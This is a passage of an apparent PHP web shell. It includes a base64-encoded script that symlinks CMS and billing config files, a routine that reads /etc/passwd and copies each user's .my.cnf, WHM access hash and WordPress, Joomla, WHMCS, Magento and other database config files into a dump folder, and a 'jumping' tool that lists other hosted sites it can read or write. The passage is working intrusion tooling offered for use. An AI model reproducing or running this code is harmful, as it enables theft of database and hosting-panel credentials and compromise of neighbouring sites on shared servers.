R4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
678. $file = "L0LZ666H05T_config/vhost.cin";
679. $handle = fopen($file ,"w+");
680. fwrite($handle ,base64_decode($vhost));
681. fclose($handle);
682. chmod($file, 0755);
683. if(exe("cd L0LZ666H05T_config && ./vhost.cin")) {
684. echo "<center><a href='$link_config/L0LZ666H05T_config'><font color=lime>Done</font></a></center>";
685. } else {
686. echo "<center><a href='$link_config/L0LZ666H05T_config/vhost.cin'><font color=lime>Done</font></a></center>";
687. }
688.  
689. } else {
690. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
691. while($passwd = fgets($etc)) {
692. if($passwd == "" || !$etc) {
693. echo "<font color=red>Can't read /etc/passwd</font>";
694. } else {
695. preg_match_all('/(.*?):x:/', $passwd, $user_config);
696. foreach($user_config[1] as $user_idx) {
697. $user_config_dir = "/home/$user_idx/public_html/";
698. if(is_readable($user_config_dir)) {
699. $grab_config = array(
700. "/home/$user_idx/.my.cnf" => "cpanel",
701. "/home/$user_idx/.accesshash" => "WHM-accesshash",
702. "$user_config_dir/po-content/config.php" => "Popoji",
703. "$user_config_dir/vdo_config.php" => "Voodoo",
704. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
705. "$user_config_dir/config/koneksi.php" => "Lokomedia",
706. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
707. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
708. "$user_config_dir/whm/configuration.php" => "WHMCS",
709. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
710. "$user_config_dir/forum/config.php" => "phpBB",
711. "$user_config_dir/sites/default/settings.php" => "Drupal",
712. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
713. "$user_config_dir/app/etc/local.xml" => "Magento",
714. "$user_config_dir/joomla/configuration.php" => "Joomla",
715. "$user_config_dir/configuration.php" => "Joomla",
716. "$user_config_dir/wp/wp-config.php" => "WordPress",
717. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
718. "$user_config_dir/wp-config.php" => "WordPress",
719. "$user_config_dir/admin/config.php" => "OpenCart",
720. "$user_config_dir/slconfig.php" => "Sitelok",
721. "$user_config_dir/application/config/database.php" => "Ellislab");
722. foreach($grab_config as $config => $nama_config) {
723. $ambil_config = file_get_contents($config);
724. if($ambil_config == '') {
725. } else {
726. $file_config = fopen("L0LZ666H05T_config/$user_idx-$nama_config.txt","w");
727. fputs($file_config,$ambil_config);
728. }
729. }
730. }
731. }
732. }
733. }
734. echo "<center><a href='?dir=$dir/L0LZ666H05T_config'><font color=lime size=4>>> Done <<</font></a></center>";
735. }
736. } elseif($_GET['do'] == 'jumping') {
737. $i = 0;
738. echo "<center>";
739. echo "<div class='margin: 5px auto;'>";
740. if(preg_match("/hsphere/", $dir)) {
741. $urls = explode("\r\n", $_POST['url']);
742. if(isset($_POST['jump'])) {
743. echo "<pre>";
744. foreach($urls as $url) {
745. $url = str_replace(array("http://","www."), "", strtolower($url));
746. $etc = "/etc/passwd";
747. $f = fopen($etc,"r");
748. while($gets = fgets($f)) {
749. $pecah = explode(":", $gets);
750. $user = $pecah[0];
751. $dir_user = "/hsphere/local/home/$user";
752. if(is_dir($dir_user) === true) {
753. $url_user = $dir_user."/".$url;
754. if(is_readable($url_user)) {
755. $i++;
756. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=#0F6516>$url_user</font></a>";
757. if(is_writable($url_user)) {
758. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=#0F6516>$url_user</font></a>";
759. }
760. echo $jrw."<br>";
761. }
762. }
763. }
764. }
765. if($i == 0) {
766. } else {
767. echo "<br>Total ada ".$i." Kamar di ".$ip;
768. }
769. echo "</pre>";
770. } else {
771. echo '<center>
772. <form method="post">
773. List Domains: <br>
774. <textarea name="url" style="width: 500px; height: 250px;">';
775. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
776. while($getss = fgets($fp)) {
777. echo $getss;
778. }
779. echo '</textarea><br>
780. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
781. </form></center>';
782. }
783. } elseif(preg_match("/vhosts|vhost/", $dir)) {
784. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
785. $urls = explode("\r\n", $_POST['url']);
786. if(isset($_POST['jump'])) {
787. echo "<pre>";
788. foreach($urls as $url) {
789. $url = str_replace("www.", "", $url);
790. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
791. if(is_dir($web_vh) === true) {
792. if(is_readable($web_vh)) {
793. $i++;
794. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=#0F6516>$web_vh</font></a>";
795. if(is_writable($web_vh)) {
796. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=#0F6516>$web_vh</font></a>";
797. }
798. echo $jrw."<br>";
799. }
800. }
801. }
802. if($i == 0) {
803. } else {
804. echo "<br>Total ada ".$i." Kamar di ".$ip;
805. }
806. echo "</pre>";
807. } else {
808. echo '<center>
809. <form method="post">
810. List Domains: <br>
811. <textarea name="url" style="width: 500px; height: 250px;">';
812. bing("ip:$ip");
813. echo '</textarea><br>
814. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
815. </form></center>';
816. }
817. } else {
818. echo "<pre>";
